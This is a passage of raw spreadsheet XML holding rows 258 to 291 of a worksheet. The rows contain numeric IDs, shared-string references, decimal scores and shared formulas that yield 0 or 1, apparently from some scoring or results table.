    </row>
    <row r="258">
      <c r="A258" s="62">
        <v>575.0</v>
      </c>
      <c r="B258" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C258" s="63" t="s">
        <v>949</v>
      </c>
      <c r="D258" s="62" t="s">
        <v>950</v>
      </c>
      <c r="E258" s="62" t="s">
        <v>951</v>
      </c>
      <c r="F258" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G258" s="62">
        <v>0.9</v>
      </c>
      <c r="H258" s="64">
        <v>1.0</v>
      </c>
      <c r="I258" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J258" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K258" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L258" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O258" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="62">
        <v>1028.0</v>
      </c>
      <c r="B259" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C259" s="63" t="s">
        <v>952</v>
      </c>
      <c r="D259" s="62" t="s">
        <v>953</v>
      </c>
      <c r="E259" s="62" t="s">
        <v>954</v>
      </c>
      <c r="F259" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G259" s="62">
        <v>0.85</v>
      </c>
      <c r="H259" s="64">
        <v>0.0</v>
      </c>
      <c r="I259" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J259" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K259" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L259" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O259" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="62">
        <v>1039.0</v>
      </c>
      <c r="B260" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C260" s="63" t="s">
        <v>955</v>
      </c>
      <c r="D260" s="62" t="s">
        <v>956</v>
      </c>
      <c r="E260" s="62" t="s">
        <v>957</v>
      </c>
      <c r="F260" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G260" s="62">
        <v>0.9</v>
      </c>
      <c r="H260" s="64">
        <v>0.0</v>
      </c>
      <c r="I260" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J260" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K260" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L260" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O260" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="62">
        <v>1300.0</v>
      </c>
      <c r="B261" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C261" s="63" t="s">
        <v>958</v>
      </c>
      <c r="D261" s="62" t="s">
        <v>959</v>
      </c>
      <c r="E261" s="62" t="s">
        <v>960</v>
      </c>
      <c r="F261" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G261" s="62">
        <v>0.95</v>
      </c>
      <c r="H261" s="64">
        <v>1.0</v>
      </c>
      <c r="I261" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J261" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K261" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L261" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O261" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="62">
        <v>1437.0</v>
      </c>
      <c r="B262" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C262" s="63" t="s">
        <v>961</v>
      </c>
      <c r="D262" s="62" t="s">
        <v>962</v>
      </c>
      <c r="E262" s="62" t="s">
        <v>963</v>
      </c>
      <c r="F262" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G262" s="62">
        <v>0.9</v>
      </c>
      <c r="H262" s="64">
        <v>1.0</v>
      </c>
      <c r="I262" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J262" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K262" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L262" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O262" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="62">
        <v>1479.0</v>
      </c>
      <c r="B263" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C263" s="63" t="s">
        <v>964</v>
      </c>
      <c r="D263" s="62" t="s">
        <v>965</v>
      </c>
      <c r="E263" s="62" t="s">
        <v>966</v>
      </c>
      <c r="F263" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G263" s="62">
        <v>0.95</v>
      </c>
      <c r="H263" s="64">
        <v>1.0</v>
      </c>
      <c r="I263" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J263" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K263" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L263" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O263" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="62">
        <v>1511.0</v>
      </c>
      <c r="B264" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C264" s="63" t="s">
        <v>967</v>
      </c>
      <c r="D264" s="62" t="s">
        <v>968</v>
      </c>
      <c r="E264" s="62" t="s">
        <v>969</v>
      </c>
      <c r="F264" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G264" s="62">
        <v>0.9</v>
      </c>
      <c r="H264" s="64">
        <v>1.0</v>
      </c>
      <c r="I264" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J264" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K264" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L264" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O264" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="62">
        <v>1532.0</v>
      </c>
      <c r="B265" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C265" s="63" t="s">
        <v>970</v>
      </c>
      <c r="D265" s="62" t="s">
        <v>971</v>
      </c>
      <c r="E265" s="62" t="s">
        <v>972</v>
      </c>
      <c r="F265" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G265" s="62">
        <v>0.9</v>
      </c>
      <c r="H265" s="64">
        <v>1.0</v>
      </c>
      <c r="I265" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J265" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K265" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L265" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O265" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="62">
        <v>1626.0</v>
      </c>
      <c r="B266" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C266" s="63" t="s">
        <v>973</v>
      </c>
      <c r="D266" s="62" t="s">
        <v>974</v>
      </c>
      <c r="E266" s="62" t="s">
        <v>975</v>
      </c>
      <c r="F266" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G266" s="62">
        <v>0.95</v>
      </c>
      <c r="H266" s="64">
        <v>1.0</v>
      </c>
      <c r="I266" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J266" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K266" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L266" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O266" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="62">
        <v>1638.0</v>
      </c>
      <c r="B267" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C267" s="63" t="s">
        <v>976</v>
      </c>
      <c r="D267" s="62" t="s">
        <v>977</v>
      </c>
      <c r="E267" s="62" t="s">
        <v>978</v>
      </c>
      <c r="F267" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G267" s="62">
        <v>0.9</v>
      </c>
      <c r="H267" s="64">
        <v>1.0</v>
      </c>
      <c r="I267" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J267" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K267" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L267" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O267" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="62">
        <v>1878.0</v>
      </c>
      <c r="B268" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C268" s="63" t="s">
        <v>979</v>
      </c>
      <c r="D268" s="62" t="s">
        <v>980</v>
      </c>
      <c r="E268" s="62" t="s">
        <v>981</v>
      </c>
      <c r="F268" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G268" s="62">
        <v>0.95</v>
      </c>
      <c r="H268" s="64">
        <v>1.0</v>
      </c>
      <c r="I268" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J268" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K268" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L268" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O268" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="62">
        <v>1915.0</v>
      </c>
      <c r="B269" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C269" s="63" t="s">
        <v>982</v>
      </c>
      <c r="D269" s="62" t="s">
        <v>983</v>
      </c>
      <c r="E269" s="62" t="s">
        <v>984</v>
      </c>
      <c r="F269" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G269" s="62">
        <v>0.95</v>
      </c>
      <c r="H269" s="64">
        <v>1.0</v>
      </c>
      <c r="I269" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J269" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K269" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L269" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O269" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="62">
        <v>1939.0</v>
      </c>
      <c r="B270" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C270" s="63" t="s">
        <v>985</v>
      </c>
      <c r="D270" s="62" t="s">
        <v>986</v>
      </c>
      <c r="E270" s="62" t="s">
        <v>987</v>
      </c>
      <c r="F270" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G270" s="62">
        <v>0.95</v>
      </c>
      <c r="H270" s="64">
        <v>1.0</v>
      </c>
      <c r="I270" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J270" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K270" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L270" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O270" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="62">
        <v>2223.0</v>
      </c>
      <c r="B271" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C271" s="63" t="s">
        <v>988</v>
      </c>
      <c r="D271" s="62" t="s">
        <v>989</v>
      </c>
      <c r="E271" s="62" t="s">
        <v>990</v>
      </c>
      <c r="F271" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G271" s="62">
        <v>0.9</v>
      </c>
      <c r="H271" s="64">
        <v>0.0</v>
      </c>
      <c r="I271" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J271" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K271" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L271" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O271" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="62">
        <v>2561.0</v>
      </c>
      <c r="B272" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C272" s="63" t="s">
        <v>991</v>
      </c>
      <c r="D272" s="62" t="s">
        <v>992</v>
      </c>
      <c r="E272" s="62" t="s">
        <v>993</v>
      </c>
      <c r="F272" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G272" s="62">
        <v>0.9</v>
      </c>
      <c r="H272" s="64">
        <v>0.0</v>
      </c>
      <c r="I272" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J272" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K272" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L272" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O272" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="62">
        <v>2584.0</v>
      </c>
      <c r="B273" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C273" s="63" t="s">
        <v>994</v>
      </c>
      <c r="D273" s="62" t="s">
        <v>995</v>
      </c>
      <c r="E273" s="62" t="s">
        <v>996</v>
      </c>
      <c r="F273" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G273" s="62">
        <v>0.95</v>
      </c>
      <c r="H273" s="64">
        <v>1.0</v>
      </c>
      <c r="I273" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J273" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K273" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L273" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O273" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="62">
        <v>3003.0</v>
      </c>
      <c r="B274" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C274" s="63" t="s">
        <v>997</v>
      </c>
      <c r="D274" s="62" t="s">
        <v>998</v>
      </c>
      <c r="E274" s="62" t="s">
        <v>999</v>
      </c>
      <c r="F274" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G274" s="62">
        <v>0.95</v>
      </c>
      <c r="H274" s="64">
        <v>1.0</v>
      </c>
      <c r="I274" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J274" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K274" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L274" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O274" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="62">
        <v>3109.0</v>
      </c>
      <c r="B275" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C275" s="63" t="s">
        <v>1000</v>
      </c>
      <c r="D275" s="62" t="s">
        <v>1001</v>
      </c>
      <c r="E275" s="62" t="s">
        <v>1002</v>
      </c>
      <c r="F275" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G275" s="62">
        <v>0.9</v>
      </c>
      <c r="H275" s="64">
        <v>0.0</v>
      </c>
      <c r="I275" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J275" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K275" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L275" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O275" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="62">
        <v>3121.0</v>
      </c>
      <c r="B276" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C276" s="63" t="s">
        <v>1003</v>
      </c>
      <c r="D276" s="62" t="s">
        <v>1004</v>
      </c>
      <c r="E276" s="62" t="s">
        <v>1005</v>
      </c>
      <c r="F276" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G276" s="62">
        <v>0.9</v>
      </c>
      <c r="H276" s="64">
        <v>0.0</v>
      </c>
      <c r="I276" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J276" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K276" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L276" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O276" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="62">
        <v>3536.0</v>
      </c>
      <c r="B277" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C277" s="63" t="s">
        <v>1006</v>
      </c>
      <c r="D277" s="62" t="s">
        <v>1007</v>
      </c>
      <c r="E277" s="62" t="s">
        <v>1008</v>
      </c>
      <c r="F277" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G277" s="62">
        <v>0.95</v>
      </c>
      <c r="H277" s="64">
        <v>1.0</v>
      </c>
      <c r="I277" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J277" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K277" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L277" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O277" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="62">
        <v>3659.0</v>
      </c>
      <c r="B278" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C278" s="63" t="s">
        <v>1009</v>
      </c>
      <c r="D278" s="62" t="s">
        <v>1010</v>
      </c>
      <c r="E278" s="62" t="s">
        <v>1011</v>
      </c>
      <c r="F278" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G278" s="62">
        <v>0.9</v>
      </c>
      <c r="H278" s="64">
        <v>0.0</v>
      </c>
      <c r="I278" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J278" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K278" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L278" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O278" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="62">
        <v>3827.0</v>
      </c>
      <c r="B279" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C279" s="63" t="s">
        <v>1012</v>
      </c>
      <c r="D279" s="62" t="s">
        <v>1013</v>
      </c>
      <c r="E279" s="62" t="s">
        <v>1014</v>
      </c>
      <c r="F279" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G279" s="62">
        <v>0.95</v>
      </c>
      <c r="H279" s="64">
        <v>1.0</v>
      </c>
      <c r="I279" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J279" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K279" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L279" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O279" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="62">
        <v>3856.0</v>
      </c>
      <c r="B280" s="62" t="s">
        <v>35</v>
      </c>
      <c r="C280" s="63" t="s">
        <v>1015</v>
      </c>
      <c r="D280" s="62" t="s">
        <v>1016</v>
      </c>
      <c r="E280" s="62" t="s">
        <v>1017</v>
      </c>
      <c r="F280" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G280" s="62">
        <v>0.95</v>
      </c>
      <c r="H280" s="64">
        <v>1.0</v>
      </c>
      <c r="I280" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J280" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K280" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L280" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O280" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="62">
        <v>14508.0</v>
      </c>
      <c r="B281" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C281" s="63" t="s">
        <v>1018</v>
      </c>
      <c r="D281" s="62" t="s">
        <v>1019</v>
      </c>
      <c r="E281" s="62" t="s">
        <v>1020</v>
      </c>
      <c r="F281" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G281" s="62">
        <v>0.85</v>
      </c>
      <c r="H281" s="64">
        <v>1.0</v>
      </c>
      <c r="I281" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J281" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K281" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L281" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M281" s="62" t="s">
        <v>1021</v>
      </c>
      <c r="N281" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O281" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="62">
        <v>14980.0</v>
      </c>
      <c r="B282" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C282" s="63" t="s">
        <v>1022</v>
      </c>
      <c r="D282" s="62" t="s">
        <v>1023</v>
      </c>
      <c r="E282" s="62" t="s">
        <v>1024</v>
      </c>
      <c r="F282" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G282" s="62">
        <v>0.9</v>
      </c>
      <c r="H282" s="64">
        <v>1.0</v>
      </c>
      <c r="I282" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J282" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K282" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L282" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O282" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="62">
        <v>14981.0</v>
      </c>
      <c r="B283" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C283" s="63" t="s">
        <v>1025</v>
      </c>
      <c r="D283" s="62" t="s">
        <v>1026</v>
      </c>
      <c r="E283" s="62" t="s">
        <v>1027</v>
      </c>
      <c r="F283" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G283" s="62">
        <v>0.9</v>
      </c>
      <c r="H283" s="64">
        <v>0.0</v>
      </c>
      <c r="I283" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J283" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K283" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L283" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O283" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="62">
        <v>14983.0</v>
      </c>
      <c r="B284" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C284" s="63" t="s">
        <v>1028</v>
      </c>
      <c r="D284" s="62" t="s">
        <v>1029</v>
      </c>
      <c r="E284" s="62" t="s">
        <v>1030</v>
      </c>
      <c r="F284" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G284" s="62">
        <v>0.95</v>
      </c>
      <c r="H284" s="64">
        <v>1.0</v>
      </c>
      <c r="I284" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J284" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K284" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L284" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O284" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="62">
        <v>15007.0</v>
      </c>
      <c r="B285" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C285" s="63" t="s">
        <v>1031</v>
      </c>
      <c r="D285" s="62" t="s">
        <v>1032</v>
      </c>
      <c r="E285" s="62" t="s">
        <v>1033</v>
      </c>
      <c r="F285" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G285" s="62">
        <v>0.95</v>
      </c>
      <c r="H285" s="64">
        <v>1.0</v>
      </c>
      <c r="I285" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J285" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K285" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L285" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O285" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="62">
        <v>15252.0</v>
      </c>
      <c r="B286" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C286" s="63" t="s">
        <v>1034</v>
      </c>
      <c r="D286" s="62" t="s">
        <v>1035</v>
      </c>
      <c r="E286" s="62" t="s">
        <v>1036</v>
      </c>
      <c r="F286" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G286" s="62">
        <v>0.95</v>
      </c>
      <c r="H286" s="64">
        <v>1.0</v>
      </c>
      <c r="I286" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J286" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K286" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L286" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O286" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="62">
        <v>15291.0</v>
      </c>
      <c r="B287" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C287" s="63" t="s">
        <v>1037</v>
      </c>
      <c r="D287" s="62" t="s">
        <v>1038</v>
      </c>
      <c r="E287" s="62" t="s">
        <v>1039</v>
      </c>
      <c r="F287" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G287" s="62">
        <v>0.95</v>
      </c>
      <c r="H287" s="64">
        <v>1.0</v>
      </c>
      <c r="I287" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J287" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K287" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L287" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O287" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="62">
        <v>15470.0</v>
      </c>
      <c r="B288" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C288" s="63" t="s">
        <v>1040</v>
      </c>
      <c r="D288" s="62" t="s">
        <v>1041</v>
      </c>
      <c r="E288" s="62" t="s">
        <v>1042</v>
      </c>
      <c r="F288" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G288" s="62">
        <v>0.8</v>
      </c>
      <c r="H288" s="64" t="s">
        <v>1043</v>
      </c>
      <c r="I288" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J288" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K288" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L288" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M288" s="62" t="s">
        <v>1044</v>
      </c>
      <c r="N288" s="62" t="s">
        <v>1045</v>
      </c>
      <c r="O288" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="62">
        <v>15505.0</v>
      </c>
      <c r="B289" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C289" s="63" t="s">
        <v>1046</v>
      </c>
      <c r="D289" s="62" t="s">
        <v>1047</v>
      </c>
      <c r="E289" s="62" t="s">
        <v>1048</v>
      </c>
      <c r="F289" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G289" s="62">
        <v>0.9</v>
      </c>
      <c r="H289" s="64">
        <v>0.0</v>
      </c>
      <c r="I289" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J289" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K289" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L289" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O289" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="62">
        <v>15608.0</v>
      </c>
      <c r="B290" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C290" s="63" t="s">
        <v>1049</v>
      </c>
      <c r="D290" s="62" t="s">
        <v>1050</v>
      </c>
      <c r="E290" s="62" t="s">
        <v>1051</v>
      </c>
      <c r="F290" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G290" s="62">
        <v>0.85</v>
      </c>
      <c r="H290" s="64">
        <v>1.0</v>
      </c>
      <c r="I290" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J290" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K290" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L290" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O290" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="62">
        <v>15931.0</v>
      </c>
      <c r="B291" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C291" s="63" t="s">
        <v>1052</v>
      </c>
      <c r="D291" s="62" t="s">
        <v>1053</v>
      </c>
      <c r="E291" s="62" t="s">
        <v>1054</v>
      </c>
      <c r="F291" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G291" s="62">
        <v>0.9</v>
      </c>
